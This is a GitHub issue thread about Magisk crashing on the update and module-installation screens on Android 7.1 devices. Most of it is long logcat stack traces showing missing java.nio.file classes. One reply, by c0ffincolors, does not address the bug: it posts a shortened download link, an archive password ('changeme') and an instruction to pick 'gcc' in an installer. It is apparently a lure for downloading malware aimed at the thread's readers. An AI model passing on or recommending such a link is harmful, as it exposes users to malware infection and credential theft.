### ISSUE TITLE
After updating the app from 27002 to 27007, it crashes on the Direct Magisk Update and Module Installation screens

### ISSUE THREAD

**Issue by KaMyKaSii** [topjohnwu/Magisk#8343]
Device: Quantum Go Q2
Android version: 7.1.1
Magisk version name: 8e82113b
Magisk version code: 27007

[logcat_magisk_update.txt](https://github.com/user-attachments/files/16766274/logcat_magisk_update.txt)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by vvb2060** [comment]
```
08-23 22:51:43.578 10674 10674 E AppContext: java.lang.NoClassDefFoundError: Failed resolution of: Ljava/nio/file/StandardOpenOption;
08-23 22:51:43.578 10674 10674 E AppContext: 	at org.apache.commons.compress.archivers.zip.ZipFile.<clinit>(ZipFile.java:263)
08-23 22:51:43.578 10674 10674 E AppContext: 	at com.topjohnwu.magisk.core.tasks.MagiskInstallImpl.extractFiles(MagiskInstaller.kt:124)
08-23 22:51:43.578 10674 10674 E AppContext: 	at com.topjohnwu.magisk.core.tasks.MagiskInstallImpl.direct(MagiskInstaller.kt:581)
08-23 22:51:43.578 10674 10674 E AppContext: 	at com.topjohnwu.magisk.core.tasks.MagiskInstaller$Direct.operations(MagiskInstaller.kt:645)
08-23 22:51:43.578 10674 10674 E AppContext: 	at com.topjohnwu.magisk.core.tasks.MagiskInstallImpl$exec$result$1.invokeSuspend(MagiskInstaller.kt:597)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlin.coroutines.jvm.internal.BaseContinuationImpl.resumeWith(ContinuationImpl.kt:33)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.DispatchedTask.run(DispatchedTask.kt:108)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.internal.LimitedDispatcher$Worker.run(LimitedDispatcher.kt:115)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.scheduling.TaskImpl.run(Tasks.kt:103)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.scheduling.CoroutineScheduler.runSafely(CoroutineScheduler.kt:584)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.executeTask(CoroutineScheduler.kt:793)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.runWorker(CoroutineScheduler.kt:697)
08-23 22:51:43.578 10674 10674 E AppContext: 	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.run(CoroutineScheduler.kt:684)
08-23 22:51:43.578 10674 10674 E AppContext: 	Suppressed: kotlinx.coroutines.internal.DiagnosticCoroutineContextException: [StandaloneCoroutine{Cancelling}@65d406c, Dispatchers.Main.immediate]
08-23 22:51:43.578 10674 10674 E AppContext: Caused by: java.lang.ClassNotFoundException: Didn't find class "java.nio.file.StandardOpenOption" on path: DexPathList[[zip file "/data/user_de/0/xrqjtf.lzcmt/dyn/current.apk"],nativeLibraryDirectories=[/system/lib64, /vendor/lib64]]
08-23 22:51:43.578 10674 10674 E AppContext: 	at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
08-23 22:51:43.578 10674 10674 E AppContext: 	at com.topjohnwu.magisk.utils.DynamicClassLoader.loadClass(DynamicClassLoader.java:36)
08-23 22:51:43.578 10674 10674 E AppContext: 	at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
08-23 22:51:43.578 10674 10674 E AppContext: 	... 13 more
08-23 22:51:43.581 10674 10674 I art     : System.exit called, status: 1
08-23 22:51:43.581 10674 10674 I AndroidRuntime: VM exiting with result code 1, cleanup skipped.
```

**Comment by Soukyuu** [comment]
I'm on 28.1 and android 7.1.2 (lineageOS 14.1), still getting something similar after confirming module installation:
```
01-01 21:29:20.386  1811  1847 I art     : Rejecting re-init on previously-failed class java.lang.Class<j$.nio.file.Path$Wrapper>: java.lang.NoClassDefFoundError: Failed resolution of: Ljava/nio/file/Path;
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.FileChannel j$.nio.channels.DesugarChannels.open(j$.nio.file.Path, j$.nio.file.OpenOption[]) (SourceFile:35)
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.SeekableByteChannel z3.h0.e0(j$.nio.file.Path, long, j$.nio.file.OpenOption[]) (SourceFile:9)
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.SeekableByteChannel z3.h0.d(j$.nio.file.Path, long, j$.nio.file.OpenOption[]) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:40)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.386  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.386  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.386  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     : Caused by: java.lang.ClassNotFoundException: Didn't find class "java.nio.file.Path" on path: DexPathList[[zip file "/data/app/com.topjohnwu.magisk-1/base.apk"],nativeLibraryDirectories=[/data/app/com.topjohnwu.magisk-1/lib/arm64, /data/app/com.topjohnwu.magisk-1/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Class dalvik.system.BaseDexClassLoader.findClass(java.lang.String) (BaseDexClassLoader.java:56)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String, boolean) (ClassLoader.java:380)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) (ClassLoader.java:312)
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.FileChannel j$.nio.channels.DesugarChannels.open(j$.nio.file.Path, j$.nio.file.OpenOption[]) (SourceFile:35)
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.SeekableByteChannel z3.h0.e0(j$.nio.file.Path, long, j$.nio.file.OpenOption[]) (SourceFile:9)
01-01 21:29:20.386  1811  1847 I art     :   at java.nio.channels.SeekableByteChannel z3.h0.d(j$.nio.file.Path, long, j$.nio.file.OpenOption[]) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:40)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.386  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.386  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.386  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.386  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.386  1811  1847 I art     : 
01-01 21:29:20.453  1811  1847 I art     : Rejecting re-init on previously-failed class java.lang.Class<j$.nio.file.attribute.m>: java.lang.NoClassDefFoundError: Failed resolution of: Ljava/nio/file/attribute/FileAttribute;
01-01 21:29:20.453  1811  1847 I art     :   at java.nio.file.attribute.FileTime j$.nio.file.attribute.FileAttributeConversions.convert(j$.nio.file.attribute.FileTime) (SourceFile:-1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.B(j$.nio.file.attribute.FileTime) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.a0() (SourceFile:25)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.Z() (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.L() (SourceFile:12)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.M(z3.a0[]) (SourceFile:42)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.D(z3.a0[], boolean) (SourceFile:5)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.G(byte[]) (SourceFile:8)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.B0(java.util.Map) (SourceFile:258)
01-01 21:29:20.453  1811  1847 I art     :   at java.util.Map z3.h0.m0() (SourceFile:62)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean) (SourceFile:19)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean, z3.h0$a) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:68)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.453  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.453  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.453  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     : Caused by: java.lang.ClassNotFoundException: Didn't find class "java.nio.file.attribute.FileAttribute" on path: DexPathList[[zip file "/data/app/com.topjohnwu.magisk-1/base.apk"],nativeLibraryDirectories=[/data/app/com.topjohnwu.magisk-1/lib/arm64, /data/app/com.topjohnwu.magisk-1/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Class dalvik.system.BaseDexClassLoader.findClass(java.lang.String) (BaseDexClassLoader.java:56)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String, boolean) (ClassLoader.java:380)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) (ClassLoader.java:312)
01-01 21:29:20.453  1811  1847 I art     :   at java.nio.file.attribute.FileTime j$.nio.file.attribute.FileAttributeConversions.convert(j$.nio.file.attribute.FileTime) (SourceFile:-1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.B(j$.nio.file.attribute.FileTime) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.a0() (SourceFile:25)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.Z() (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.L() (SourceFile:12)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.M(z3.a0[]) (SourceFile:42)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.D(z3.a0[], boolean) (SourceFile:5)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.T.G(byte[]) (SourceFile:8)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.B0(java.util.Map) (SourceFile:258)
01-01 21:29:20.453  1811  1847 I art     :   at java.util.Map z3.h0.m0() (SourceFile:62)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean) (SourceFile:19)
01-01 21:29:20.453  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean, z3.h0$a) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:68)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.453  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.453  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.453  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.453  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.453  1811  1847 I art     : 
01-01 21:29:20.457  1811  1847 I art     : Rejecting re-init on previously-failed class java.lang.Class<j$.nio.file.attribute.k>: java.lang.NoClassDefFoundError: Failed resolution of: Ljava/nio/file/attribute/FileAttribute;
01-01 21:29:20.457  1811  1847 I art     :   at java.nio.file.attribute.FileTime j$.nio.file.attribute.FileAttributeConversions.convert(j$.nio.file.attribute.FileTime) (SourceFile:-1)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.B(j$.nio.file.attribute.FileTime) (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.a0() (SourceFile:25)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.Z() (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.L() (SourceFile:12)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.M(z3.a0[]) (SourceFile:42)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.D(z3.a0[], boolean) (SourceFile:5)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.G(byte[]) (SourceFile:8)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.h0.B0(java.util.Map) (SourceFile:258)
01-01 21:29:20.457  1811  1847 I art     :   at java.util.Map z3.h0.m0() (SourceFile:62)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean) (SourceFile:19)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean, z3.h0$a) (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:68)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.457  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.457  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.457  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.457  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.457  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.457  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.457  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.457  1811  1847 I art     : Caused by: java.lang.ClassNotFoundException: Didn't find class "java.nio.file.attribute.FileAttribute" on path: DexPathList[[zip file "/data/app/com.topjohnwu.magisk-1/base.apk"],nativeLibraryDirectories=[/data/app/com.topjohnwu.magisk-1/lib/arm64, /data/app/com.topjohnwu.magisk-1/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Class dalvik.system.BaseDexClassLoader.findClass(java.lang.String) (BaseDexClassLoader.java:56)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String, boolean) (ClassLoader.java:380)
01-01 21:29:20.457  1811  1847 I art     :   at java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) (ClassLoader.java:312)
01-01 21:29:20.457  1811  1847 I art     :   at java.nio.file.attribute.FileTime j$.nio.file.attribute.FileAttributeConversions.convert(j$.nio.file.attribute.FileTime) (SourceFile:-1)
01-01 21:29:20.457  1811  1847 I art     :   at void z3.T.B(j$.nio.file.attribute.FileTime) (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.a0() (SourceFile:25)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.Z() (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.L() (SourceFile:12)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.M(z3.a0[]) (SourceFile:42)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.D(z3.a0[], boolean) (SourceFile:5)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.T.G(byte[]) (SourceFile:8)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.h0.B0(java.util.Map) (SourceFile:258)
01-01 21:29:20.458  1811  1847 I art     :   at java.util.Map z3.h0.m0() (SourceFile:62)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean) (SourceFile:19)
01-01 21:29:20.458  1811  1847 I art     :   at void z3.h0.<init>(java.nio.channels.SeekableByteChannel, java.lang.String, java.nio.charset.Charset, boolean, boolean, boolean, z3.h0$a) (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     :   at z3.h0 z3.h0$d.r() (SourceFile:68)
01-01 21:29:20.458  1811  1847 I art     :   at java.lang.Object L1.D.a(java.io.File, java.io.File, java.lang.String, boolean, u2.d) (SourceFile:105)
01-01 21:29:20.458  1811  1847 I art     :   at java.lang.Object K1.h.f(u2.d) (SourceFile:213)
01-01 21:29:20.458  1811  1847 I art     :   at java.lang.Object K1.h.a(K1.h, u2.d) (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     :   at java.lang.Object K1.h$a.u(java.lang.Object) (SourceFile:43)
01-01 21:29:20.458  1811  1847 I art     :   at void w2.a.h(java.lang.Object) (SourceFile:9)
01-01 21:29:20.458  1811  1847 I art     :   at void P2.O.run() (SourceFile:124)
01-01 21:29:20.458  1811  1847 I art     :   at void U2.m$a.run() (SourceFile:4)
01-01 21:29:20.458  1811  1847 I art     :   at void W2.k.run() (SourceFile:3)
01-01 21:29:20.458  1811  1847 I art     :   at void W2.a.X(W2.h) (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     :   at void W2.a$c.d(W2.h) (SourceFile:15)
01-01 21:29:20.458  1811  1847 I art     :   at void W2.a$c.p() (SourceFile:29)
01-01 21:29:20.458  1811  1847 I art     :   at void W2.a$c.run() (SourceFile:1)
01-01 21:29:20.458  1811  1847 I art     : 
01-01 21:29:20.470  1811  1811 E f       : java.lang.NoClassDefFoundError: Failed resolution of: Ljava/nio/file/attribute/FileTime;
01-01 21:29:20.470  1811  1811 E f       :      at j$.nio.file.attribute.FileAttributeConversions.convert(SourceFile:24)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.B(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.a0(SourceFile:25)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.Z(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.L(SourceFile:12)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.M(SourceFile:42)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.D(SourceFile:5)
01-01 21:29:20.470  1811  1811 E f       :      at z3.T.G(SourceFile:8)
01-01 21:29:20.470  1811  1811 E f       :      at z3.h0.B0(SourceFile:258)
01-01 21:29:20.470  1811  1811 E f       :      at z3.h0.m0(SourceFile:62)
01-01 21:29:20.470  1811  1811 E f       :      at z3.h0.<init>(SourceFile:19)
01-01 21:29:20.470  1811  1811 E f       :      at z3.h0.<init>(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      at z3.h0$d.r(SourceFile:68)
01-01 21:29:20.470  1811  1811 E f       :      at L1.D.a(SourceFile:105)
01-01 21:29:20.470  1811  1811 E f       :      at K1.h.f(SourceFile:213)
01-01 21:29:20.470  1811  1811 E f       :      at K1.h.a(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      at K1.h$a.u(SourceFile:43)
01-01 21:29:20.470  1811  1811 E f       :      at w2.a.h(SourceFile:9)
01-01 21:29:20.470  1811  1811 E f       :      at P2.O.run(SourceFile:124)
01-01 21:29:20.470  1811  1811 E f       :      at U2.m$a.run(SourceFile:4)
01-01 21:29:20.470  1811  1811 E f       :      at W2.k.run(SourceFile:3)
01-01 21:29:20.470  1811  1811 E f       :      at W2.a.X(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      at W2.a$c.d(SourceFile:15)
01-01 21:29:20.470  1811  1811 E f       :      at W2.a$c.p(SourceFile:29)
01-01 21:29:20.470  1811  1811 E f       :      at W2.a$c.run(SourceFile:1)
01-01 21:29:20.470  1811  1811 E f       :      Suppressed: U2.i: [B0{Cancelling}@d38b20e, Dispatchers.Main.immediate]
01-01 21:29:20.470  1811  1811 E f       : Caused by: java.lang.ClassNotFoundException: Didn't find class "java.nio.file.attribute.FileTime" on path: DexPathList[[zip file "/data/app/com.topjohnwu.magisk-1/base.apk"],nativeLibraryDirectories=[/data/app/com.topjohnwu.magisk-1/lib/arm64, /data/app/com.topjohnwu.magisk-1/base.apk!/lib/arm64-v8a, /system/lib64, /vendor/lib64]]
01-01 21:29:20.470  1811  1811 E f       :      at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
01-01 21:29:20.470  1811  1811 E f       :      at java.lang.ClassLoader.loadClass(ClassLoader.java:380)
01-01 21:29:20.470  1811  1811 E f       :      at java.lang.ClassLoader.loadClass(ClassLoader.java:312)
01-01 21:29:20.470  1811  1811 E f       :      ... 25 more
01-01 21:29:20.473  1811  1811 I art     : System.exit called, status: 1

```
